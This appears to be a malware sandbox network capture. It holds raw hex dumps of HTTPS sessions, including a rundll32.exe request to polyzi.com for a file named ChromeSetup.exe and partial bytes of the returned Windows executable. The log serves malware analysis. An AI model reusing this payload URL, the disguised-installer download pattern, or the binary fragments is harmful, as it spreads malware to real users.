                                                                                                                                                                                    2023-01-05 07:58:12 UTC10374INData Raw: 83 74 af 80 ae 3f c9 71 82 cf 1d 3f ff d4 81 e9 da 46 83 67 39 9e fa 61 3d d2 8a fa 6a 41 00 0c f3 39 4c e3 8f 27 5e 2c a8 2f e6 44 26 e1 ad ac 61 58 b8 9a 54 d3 7f 96 46 78 a4 23 69 e1 43 dd 79 9b 51 d7 2e a2 b6 82 5e 55 3f 15 3a 53 be 5b a6 f4 02 64 d4 61 6c ca ff 00 ea a9 a5 fe 8f 6b bf ab 39 1f 1b 03 f1 66 29 cd bd 84 01 4f 3f b1 07 4b d4 85 a4 57 06 ee 36 dc 38 eb ee 1b df 36 20 9c 91 e5 4b 76 cc 3c e9 a7 69 da 15 b1 f3 05 fb 31 2b 1f 15 88 ee a5 bb 1a 76 cc 1c 23 8a 5c 11 ef 66 24 f1 bb af 30 0f 31 69 44 b3 12 f1 4b cb a7 45 6e c3 37 31 c4 70 e4 be 85 b2 45 9d fe 5b 35 c5 d5 8b 45 75 f1 5b a9 f8 6b d8 f7 19 a3 ed 4c e2 26 a3 cd 87 0f 54 0e a9 a9 e9 97 5a ad cd bc d6 e9 34 11 af 1a f4 6e 9d 6b ed 8e 1c 73 8c 04 af 72 dd 16 1d 67 63 a5 5d ea 42 d7 eb
                                                                                                                                                                                    Data Ascii: t?q?Fg9a=jA9L'^,/D&aXTFx#iCyQ.^U?:S[dalk9f)O?KW686 Kv<i1+v#\f$01iDKEn71pE[5Eu[kL&TZ4nksrgc]B
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10390INData Raw: 86 39 aa 5e 6a 64 36 a4 8c b2 80 77 92 35 a1 5e df 12 74 a7 be 6d 31 e0 11 14 1b 05 82 ed 64 5a c3 e5 f4 bc ba 8d 0d cb ec 9c 40 1b f8 9a 66 4c 61 be cd 53 04 17 9a e9 b6 c6 eb 55 8a 11 bb 12 09 a1 cd dc 7e 84 df 08 66 fa be b5 0f 96 51 7f d1 82 4e f5 e2 5b a1 a7 72 7f 86 6b 63 84 c8 a2 22 d8 66 a5 e7 0d 43 5a 3c 27 9c aa 57 64 06 88 3e 81 99 f1 c3 c2 d8 60 94 45 6f 6d 2c c1 a6 72 a6 bb b2 75 1e f9 92 24 4e cb c3 6c c3 ca 7a 1f 97 2e b5 03 16 a1 39 b9 2c 42 c6 07 25 2d 5e c6 9d 0f 6c c7 cd 22 3e 9d 9a a6 08 e4 f5 8b df 24 f9 4f f2 fa 44 d6 75 48 d4 5d b0 ad bd 97 2d bd 99 eb fc 73 5a 73 cb 26 c1 a6 40 d5 bc 83 ce de 79 d7 3c db 70 c2 67 09 02 b5 12 18 be c0 1d a9 4f b5 99 f8 b1 46 3b 96 d8 57 32 f3 7b bb 39 ed 1d be b1 55 90 1a 9a ec 7c 7a 66 e2 32 89 d8
                                                                                                                                                                                    Data Ascii: 9^jd6w5^tm1dZ@fLaSU~fQN[rkc"fCZ<'Wd>`Eom,ru$Nlz.9,B%-^l">$ODuH]-sZs&@y<pgOF;W2{9U|zf2
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10393INData Raw: 81 ee 9d 92 1a 29 3c 9a 80 0f 73 9c ee 48 f1 d0 08 81 dd f3 a3 fe 6a df 5b dd cb c2 4e 72 09 5a ac f4 2b 40 7f 67 a6 d9 ba c7 d9 e0 45 c9 98 b6 34 da f4 bf 5d 93 50 d1 25 9a 3b d7 6e 4c 5a 9c 4d 7e d0 cc f1 8f 6e 1c 9f 4a 4f 2a 28 9d 6f 5b 9b 53 22 4d 46 ce 29 6e 08 f8 a5 84 94 63 fe b0 fb 27 2b c5 8c 0f a4 ed dc c6 c0 44 e8 1e 56 b2 bd 51 35 dd d2 c2 58 ec 9b 96 1f 76 63 e7 d4 4a 3b 01 68 22 83 d6 b4 0b 1d 4e 18 56 1d 3e 3e 16 e8 7f bf 9f 62 e3 c5 57 ae 73 93 90 be 22 7e 0b 76 c7 3f 34 b4 bb 8d 5a 3b 68 6e 24 09 2d 18 1e 35 62 c3 e8 de 99 b0 d1 67 10 37 4b 09 51 63 5a 1f 94 a2 b5 64 6b c9 59 f8 8f b2 a0 83 4f 72 dd 33 23 3e b8 9d a2 ce 45 9b 68 3a ed 96 85 ea 46 25 96 76 76 aa 86 a0 14 f0 db 22 72 12 37 71 e6 ca 34 b9 e4 d7 e4 12 5c 01 1d b8 fb 29 5d d8
                                                                                                                                                                                    Data Ascii: )<sHj[NrZ+@gE4]P%;nLZM~nJO*(o[S"MF)nc'+DVQ5XvcJ;h"NV>>bWs"~v?4Z;hn$-5bg7KQcZdkYOr3#>Eh:F%vv"r7q4\)]
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10409INData Raw: 14 97 f4 bc d6 90 1b 5b 89 4b 46 5a ac a5 f6 24 74 db db 33 3c 2e 2d c2 40 45 5f 4b 35 cd bc 7e 91 1e 8d 03 08 55 aa 41 a7 da 23 c4 fe 1d 32 11 87 09 df e6 d5 28 d2 2f cb 56 5a 9d fd fc 50 69 51 34 97 01 81 00 0a 81 ee c7 b0 f7 ca 72 98 d7 a9 85 b3 3f cc bf cb 8d 52 17 4d 52 dd 0d c1 11 af d6 59 40 1f 17 72 aa 00 01 3f 1c bf b3 f5 42 b8 1a 72 4a cb 04 b3 b7 6d 6a 78 ec 20 86 38 5f 60 58 d7 7f 76 27 37 32 3c 1b a7 9a 6b 63 6d 04 3e ab 69 77 d5 e2 1a 17 f4 d7 93 3e db 90 36 e2 9f e5 1c d4 65 ce 41 dc 73 73 60 00 e6 c4 0e a9 77 60 c9 1c 4c d1 48 2b cd ea 77 07 a1 f7 db 33 46 3e ad b3 21 98 db ea 57 9a b6 8d 28 9e 54 75 23 e1 0f 50 d5 1f b4 69 b2 81 e2 73 07 8a a7 5d ee 25 0b 62 d6 9e 6e 9e ce 73 74 e8 2e 27 a5 0b 48 49 d8 0a 28 1f e4 8f 0c be 7a 41 21 5c 9c
                                                                                                                                                                                    Data Ascii: [KFZ$t3<.-@E_K5~UA#2(/VZPiQ4r?RMRY@r?BrJmjx 8_`Xv'72<kcm>iw>6eAss`w`LH+w3F>!W(Tu#Pis]%bnst.'HI(zA!\
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10425INData Raw: 02 a0 f7 ab 75 1d 32 81 bc f8 a5 fc 23 6f 7b 22 6b 9b 26 d1 be ad e5 58 a5 92 79 e3 b6 2a b5 8e 05 e3 2c 9c 57 7f 8e 9b 54 b6 fb 9c d6 67 07 3c 80 00 9f 32 82 2d 8d 5c 79 d9 75 2d 51 6e 2d 27 51 39 01 09 31 84 e7 53 5d c7 4e b9 b4 1a 43 08 f0 d6 c8 e1 20 53 d5 f4 78 2f ad 2e a1 bf bf 91 05 eb 9e 29 0a 01 c1 60 22 94 14 db 76 ce 77 51 30 3d 20 38 b2 17 b3 09 d5 f5 58 ae fc cf 75 73 ac 5d a0 85 0b d2 28 8d 6a b1 8f 85 0d 3f 66 9b 66 d7 1e 3f 40 11 1f 16 f8 c4 d5 30 2d 7b cc 9f a5 de 44 8a 21 14 2e c5 82 29 3c 56 bd 82 f4 cd c6 1d 3f 06 e5 ba 26 92 5d 3f 4e 33 4b c6 10 3d 53 d0 9e 83 dc e6 5c f2 d7 3e 4c a5 26 49 a8 59 59 5a d9 ac 76 dc ae 6f 88 0c d2 2e d1 aa 8a fd e7 35 b0 9c a6 6e 5e 98 fd a5 a6 f8 98 dc 01 a7 96 b3 74 19 b0 97 a4 6c 92 8f 86 e4 3b a4 6e
                                                                                                                                                                                    Data Ascii: u2#o{"k&Xy*,WTg<2-\yu-Qn-'Q91S]NC Sx/.)`"vwQ0= 8Xus](j?ff?@0-{D!.)<V?&]?N3K=S\>L&IYYZvo.5n^tl;n
                                                                                                                                                                                    2023-01-05 07:58:12 UTC10429INData Raw: 18 56 e8 0f d2 cd 3d 04 d5 a8 22 9e 14 ee 29 f3 cb 4e 2a e4 c0 82 4b ff d3 f3 55 a8 b0 9e 05 b7 bf e4 9d 28 c3 a7 d3 9c 3c cc a2 6e 3b b8 c4 27 3a 5f 92 ac 96 71 32 dc ab 44 77 56 07 71 ed 98 59 75 d2 22 b8 77 63 c2 15 bc cd a1 69 b2 c0 cb 08 33 5c b0 d9 ab be 43 4b a8 98 36 76 09 ba 61 76 1e 48 bd 69 55 e7 21 63 ae fb d3 ee cd e6 4d 7c 6a 87 34 f3 7a 5d a7 94 47 a0 bf 04 73 42 07 57 41 5f a4 8c e6 27 ae df 99 0d 7c 56 b2 2f 2c f9 7d a5 e4 d1 7a 52 29 dc 0e de e0 e0 96 b3 35 6c 6d 9f 11 1c d9 c5 de 9f 1d e0 82 55 a4 8d 12 85 52 77 21 73 9e 86 53 0b 1f ce 6c 06 d0 10 58 c8 b2 ca 97 01 78 96 e5 19 ee 3b 6d e1 f2 cc d9 65 14 29 94 60 0a dd 4b 5e fd 05 6e 61 b4 b5 69 e7 ae c5 46 d5 f7 c9 e9 b1 78 92 b9 1a 1e 6c 85 00 f3 2d 5f cd 3e 65 d6 ae 3e ad 72 cd 17 23
                                                                                                                                                                                    Data Ascii: V=")N*KU(<n;':_q2DwVqYu"wci3\CK6vavHiU!cM|j4z]GsBWA_'|V/,}zR)5lmURw!sSlXx;me)`K^naiFxl-_>e>r#


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    37192.168.2.44973995.217.49.230443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10443OUTGET /systems/ChromeSetup.exe HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Host: polyzi.com


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    3895.217.49.230443192.168.2.449739C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10443INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:27 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Last-Modified: Thu, 05 Jan 2023 06:25:03 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Content-Length: 215040
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10443INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 b7 a1 8c 86 d6 cf df 86 d6 cf df 86 d6 cf df 3b 99 59 df 87 d6 cf df 98 84 5a df 9f d6 cf df 98 84 4c df f9 d6 cf df a1 10 b4 df 83 d6 cf df 86 d6 ce df 05 d6 cf df 98 84 4b df a2 d6 cf df 98 84 5b df 87 d6 cf df 98 84 5e df 87 d6 cf df 52 69 63 68 86 d6 cf df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf ea c8 62 00 00 00
                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$;YZLK[^RichPELb
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10451INData Raw: 00 00 c8 a5 b7 f4 3f 1b fe 26 4c cd 92 43 3e 00 00 00 00 00 40 0c 40 00 00 00 b8 12 c1 f4 3f 99 d1 7d 18 e3 fb 4c 3e 00 00 00 00 00 80 0c 40 00 00 00 c0 58 ca f4 3f 4c 6f a2 88 8c b7 13 3e 00 00 00 00 00 c0 0c 40 00 00 00 c0 78 d3 f4 3f 2d d4 1b cf a0 99 39 3e 00 00 00 00 00 00 0d 40 00 00 00 a0 73 dc f4 3f 36 46 49 44 1b 3f 39 3e 00 00 00 00 00 40 0d 40 00 00 00 38 4a e5 f4 3f 8c 99 ab be 67 73 4c 3e 00 00 00 00 00 80 0d 40 00 00 00 64 fd ed f4 3f 11 15 98 a0 79 10 15 3e 00 00 00 00 00 c0 0d 40 00 00 00 e8 8d f6 f4 3f 3e 9f 26 bb 30 39 43 3e 00 00 00 00 00 00 0e 40 00 00 00 94 fc fe f4 3f 04 0a 94 fb 3c c5 41 3e 00 00 00 00 00 40 0e 40 00 00 00 28 4a 07 f5 3f 10 49 8f 16 56 09 43 3e 00 00 00 00 00 80 0e 40 00 00 00 60 77 0f f5 3f bb 84 5e 04 40 a5 4e 3e
                                                                                                                                                                                    Data Ascii: ?&LC>@@?}L>@X?Lo>@x?-9>@s?6FID?9>@@8J?gsL>@d?y>@?>&09C>@?<A>@@(J?IVC>@`w?^@N>
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10459INData Raw: 4c f7 65 a4 8b 45 a4 81 45 60 49 fb 67 26 81 6d ac 29 a5 0a 37 b8 1b d4 7a 0f f7 65 6c 8b 45 6c b8 6f 87 c7 63 f7 65 ac 8b 45 ac b8 1b 14 99 19 f7 65 b4 8b 45 b4 81 6d 4c 00 da fd 78 81 ad 5c ff ff ff 0f 6e a5 4a b8 a0 f1 e3 49 f7 65 04 8b 45 04 b8 4e 7d ff 78 f7 65 3c 8b 45 3c b8 49 eb c7 4d f7 65 e0 8b 45 e0 b8 4b b9 37 73 f7 65 ac 8b 45 ac 81 6d 08 7c c0 15 36 81 ad 50 ff ff ff 37 2f 25 53 b8 33 65 4b 34 f7 65 d0 8b 45 d0 81 45 bc de 53 0c 4f 81 6d 6c 8d 3d 90 7f 81 45 00 31 60 e1 18 81 45 94 9a 93 04 35 81 45 98 1e 69 90 3c 81 6d f0 47 38 79 35 81 45 10 af ba 3b 50 b8 f9 c8 ed 11 f7 65 a4 8b 45 a4 81 6d f4 31 50 cc 29 81 45 60 4c f5 c5 34 81 45 6c 61 b8 d5 05 81 ad 58 ff ff ff 8d 3d 5b 4d b8 7c c3 04 73 f7 65 68 8b 45 68 b8 7c 70 f5 2b f7 65 a0 8b 45
                                                                                                                                                                                    Data Ascii: LeEE`Ig&m)7zelEloceEeEmLx\nJIeEN}xe<E<IMeEK7seEm|6P7/%S3eK4eEESOml=E1`E5Ei<mG8y5E;PeEm1P)E`L4ElaX=[M|sehEh|p+eE
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10467INData Raw: 00 33 c5 89 45 fc 8b 45 08 53 56 57 8b 7d 0c 6a 16 5e 56 8d 4d e4 51 8d 4d d4 51 ff 70 04 ff 30 e8 43 62 00 00 33 db 83 c4 14 3b fb 75 18 e8 d0 fb ff ff 53 53 53 53 53 89 30 e8 5c fb ff ff 83 c4 14 8b c6 eb 6f 8b 45 10 3b c3 76 e1 8b 75 14 83 f8 ff 75 05 83 c8 ff eb 14 33 c9 83 7d d4 2d 0f 94 c1 2b c1 33 c9 3b f3 0f 9f c1 2b c1 8d 4d d4 51 8d 4e 01 51 50 33 c0 83 7d d4 2d 0f 94 c0 33 c9 3b f3 0f 9f c1 03 c7 03 c8 51 e8 5b 60 00 00 83 c4 10 3b c3 74 04 88 1f eb 19 ff 75 1c 8d 45 d4 53 50 ff 75 18 8b c7 56 ff 75 10 e8 d3 fd ff ff 83 c4 18 8b 4d fc 5f 5e 33 cd 5b e8 f2 4d 00 00 c9 c3 8b ff 55 8b ec 6a 00 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 15 ff ff ff 83 c4 18 5d c3 8b ff 55 8b ec 83 ec 24 56 57 ff 75 1c 8d 4d dc c7 45 ec ff 03 00 00 33 ff c7 45
                                                                                                                                                                                    Data Ascii: 3EESVW}j^VMQMQp0Cb3;uSSSSS0\oE;vuu3}-+3;+MQNQP3}-3;Q[`;tuESPuVuM_^3[MUjuuuuu]U$VWuME3E
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10475INData Raw: 53 8b 55 08 ff 06 e8 c7 ff ff ff 8b d8 83 fb ff 74 0e 0f b6 c3 50 e8 ff 3a 00 00 59 85 c0 75 e1 8b c3 5b 5d c3 8b ff 55 8b ec 81 ec fc 01 00 00 a1 b8 8a 42 00 33 c5 89 45 fc 8b 4d 14 8b 45 08 56 33 f6 57 8b 7d 0c 89 8d 1c fe ff ff 8d 8d 7c fe ff ff 89 85 64 fe ff ff 89 8d 54 fe ff ff c7 85 24 fe ff ff 5e 01 00 00 89 b5 30 fe ff ff 89 b5 18 fe ff ff 89 b5 78 fe ff ff 3b fe 75 20 e8 3f dc ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 c7 db ff ff 83 c4 14 83 c8 ff e9 35 0f 00 00 3b c6 74 dc f6 40 0c 40 53 75 7a 50 e8 8e fc ff ff 59 ba 70 8a 42 00 83 f8 ff 74 1b 83 f8 fe 74 16 8b c8 83 e1 1f 8b d8 c1 fb 05 c1 e1 06 03 0c 9d 80 3c 44 00 eb 02 8b ca f6 41 24 7f 75 26 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 83 e0 1f c1 f9 05 c1 e0 06 03 04 8d 80 3c 44 00 eb 02 8b c2 f6
                                                                                                                                                                                    Data Ascii: SUtP:Yu[]UB3EMEV3W}|dT$^0x;u ?VVVVV5;t@@SuzPYpBtt<DA$u&tt<D
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10482INData Raw: 6a 00 e8 9d fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 8e fe ff ff 83 c4 0c c3 8b ff 56 e8 c9 07 00 00 8b f0 56 e8 aa 3d 00 00 56 e8 98 4b 00 00 56 e8 ae bb ff ff 56 e8 41 58 00 00 56 e8 2c 58 00 00 56 e8 14 56 00 00 56 e8 fe 01 00 00 56 e8 b9 54 00 00 68 07 a8 40 00 e8 1b 07 00 00 83 c4 24 a3 c0 8a 42 00 5e c3 8b ff 55 8b ec 51 51 53 8b 5d 08 56 57 33 f6 33 ff 89 7d fc 3b 1c fd c8 8a 42 00 74 09 47 89 7d fc 83 ff 17 72 ee 83 ff 17 0f 83 77 01 00 00 6a 03 e8 80 5a 00 00 59 83 f8 01 0f 84 34 01 00 00 6a 03 e8 6f 5a 00 00 59 85 c0 75 0d 83 3d 00 86 42 00 01 0f 84 1b 01 00 00 81 fb fc 00 00 00 0f 84 41 01 00 00 68 18 1f 40 00 bb 14 03 00 00 53 bf 30 31 44 00 57 e8 21 21 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 ff ba ff ff 83 c4 14 68 04 01 00 00 be 49 31
                                                                                                                                                                                    Data Ascii: jjjjVV=VKVVAXV,XVVVVTh@$B^UQQS]VW33};BtG}rwjZY4joZYu=BAh@S01DW!!tVVVVVhI1
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10490INData Raw: 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 34 c8 40 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 34 c8 40 00 90 23 d1 8a 06 88 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 34 c8 40 00 8d 49 00 2b c8 40 00 18 c8 40 00 10 c8 40 00 08 c8 40 00 00 c8 40 00 f8 c7 40 00 f0 c7 40 00 e8 c7 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 34 c8 40 00 8b ff 44 c8 40 00 4c c8 40 00 58 c8 40 00 6c c8 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88
                                                                                                                                                                                    Data Ascii: GFGr$4@I#FGr$4@#r$4@I+@@@@@@@@DDDDDDDDDDDDDD$4@D@L@X@l@E^_E^_F
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10498INData Raw: e8 03 00 00 3b 05 0c 38 44 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c3 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 0c ff 75 08 e8 91 48 00 00 8b f8 59 59 85 ff 75 2c 39 45 0c 74 27 39 05 0c 38 44 00 76 1f 56 ff 15 10 11 40 00 8d 86 e8 03 00 00 3b 05 0c 38 44 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c1 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 10 ff 75 0c ff 75 08 e8 5b 4a 00 00 8b f8 83 c4 0c 85 ff 75 2c 39 45 10 74 27 39 05 0c 38 44 00 76 1f 56 ff 15 10 11 40 00 8d 86 e8 03 00 00 3b 05 0c 38 44 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 bd 8b c7 5f 5e 5d c3 6a 10 68 c8 6b 41 00 e8 eb 9e ff ff 33 db 89 5d e4 6a 01 e8 89 f3 ff ff 59 89 5d fc 6a 03 5f 89 7d e0 3b 3d a0 4d 44 00 7d 57 8b f7 c1 e6 02 a1 80 3d 44 00 03 c6 39 18 74 44 8b 00 f6 40 0c 83 74 0f 50
                                                                                                                                                                                    Data Ascii: ;8Dvu_^]UVW3uuHYYu,9Et'98DvV@;8Dvu_^]UVW3uuu[Ju,9Et'98DvV@;8Dvu_^]jhkA3]jY]j_};=MD}W=D9tD@tP
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10506INData Raw: 06 8b 40 04 89 45 20 8b 35 94 11 40 00 33 c0 39 5d 24 53 53 ff 75 14 0f 95 c0 ff 75 10 8d 04 c5 01 00 00 00 50 ff 75 20 ff d6 8b f8 3b fb 0f 84 8f 01 00 00 7e 43 6a e0 33 d2 58 f7 f7 83 f8 02 72 37 8d 44 3f 08 3d 00 04 00 00 77 13 e8 2d 3e 00 00 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 51 28 00 00 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 89 45 f4 eb 03 89 5d f4 39 5d f4 0f 84 3e 01 00 00 57 ff 75 f4 ff 75 14 ff 75 10 6a 01 ff 75 20 ff d6 85 c0 0f 84 e3 00 00 00 8b 35 9c 11 40 00 53 53 57 ff 75 f4 ff 75 0c ff 75 08 ff d6 8b c8 89 4d f8 3b cb 0f 84 c2 00 00 00 f7 45 0c 00 04 00 00 74 29 39 5d 1c 0f 84 b0 00 00 00 3b 4d 1c 0f 8f a7 00 00 00 ff 75 1c ff 75 18 57 ff 75 f4 ff 75 0c ff 75 08 ff d6 e9 90 00 00 00 3b cb 7e 45 6a e0 33 d2 58 f7 f1 83 f8 02
                                                                                                                                                                                    Data Ascii: @E 5@39]$SSuuPu ;~Cj3Xr7D?=w->;tPQ(Y;tE]9]>Wuuuju 5@SSWuuuM;Et)9];MuuWuuu;~Ej3X
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10514INData Raw: e0 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d e8 33 f6 3b de 0f 85 7b fd ff ff 8b 4d e8 c1 e9 10 ba ff 3f 00 00 b8 ff 7f 00 00 66 3b ca 0f 82 a3 02 00 00 ff 45 b4 33 d2 89 55 b0 89 55 f0 89 55 f4 89 55 f8 8b 55 da 0f b7 c9 8b da 33 d9 23 c8 23 d0 81 e3 00 80 00 00 8b f8 8d 34 0a 89 5d a4 0f b7 f6 66 3b cf 0f 83 4c 02 00 00 66 3b d0 0f 83 43 02 00 00 b8 fd bf 00 00 66 3b f0 0f 87 35 02 00 00 b8 bf 3f 00 00 66 3b f0 77 4b 33 c0 89 45 e4 89 45 e0 e9 39 02 00 00 66 8b 45 f2 0b 7d b8 66 89 45 e0 8b 45 f4 89 45 e2 8b 45 f8 89 45 e6 66 89 7d ea e9 56 ff ff ff 33 c0 33 f6 66 39 75 b8 0f 94 c0 48 25 00 00 00 80 05 00 80 ff 7f 89 45 e8 e9 5c fd ff ff 33 c0 66 3b c8 75 1d 46 f7 45 e8 ff ff ff 7f 75 13 39 45 e4 75 0e 39 45 e0 75 09 66 89 45 ea e9 da 01 00 00 66 3b
                                                                                                                                                                                    Data Ascii: IM3;{M?f;E3UUUUU3##4]f;Lf;Cf;5?f;wK3EE9fE}fEEEEEf}V33f9uH%E\3f;uFEu9Eu9EufEf;
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10522INData Raw: 8d 4c 24 08 2b c8 83 e1 0f 03 c1 1b c9 0b c1 59 e9 7a 16 ff ff 51 8d 4c 24 08 2b c8 83 e1 07 03 c1 1b c9 0b c1 59 e9 64 16 ff ff 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 e0 fb ff ff 83 c4 0c 5d c3 8b ff 55 8b ec 83 ec 18 a1 b8 8a 42 00 33 c5 89 45 fc 8b 45 10 53 56 33 f6 57 c7 45 e8 4e 40 00 00 89 30 89 70 04 89 70 08 39 75 0c 0f 86 46 01 00 00 8b 10 8b 58 04 8b f0 8d 7d f0 a5 a5 a5 8b ca c1 e9 1f 8d 3c 12 8d 14 1b 0b d1 8b 48 08 8b f3 c1 ee 1f 03 c9 0b ce 89 7d ec 8b f7 83 65 ec 00 8b da c1 eb 1f 03 c9 c1 ef 1f 0b cb 8b 5d f0 03 f6 03 d2 0b d7 8d 3c 1e 89 30 89 50 04 89 48 08 3b fe 72 04 3b fb 73 07 c7 45 ec 01 00 00 00 33 db 89 38 39 5d ec 74 1a 8d 72 01 3b f2 72 05 83 fe 01 73 03 33 db 43 89 70 04 85 db 74 04 41 89 48 08 8b 48 04 8b 55 f4 8d 1c 11 33 f6
                                                                                                                                                                                    Data Ascii: L$+YzQL$+YdUjju]UB3EESV3WEN@0pp9uFX}<H}e]<0PH;r;sE389]tr;rs3CptAHHU3
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10529INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10537INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
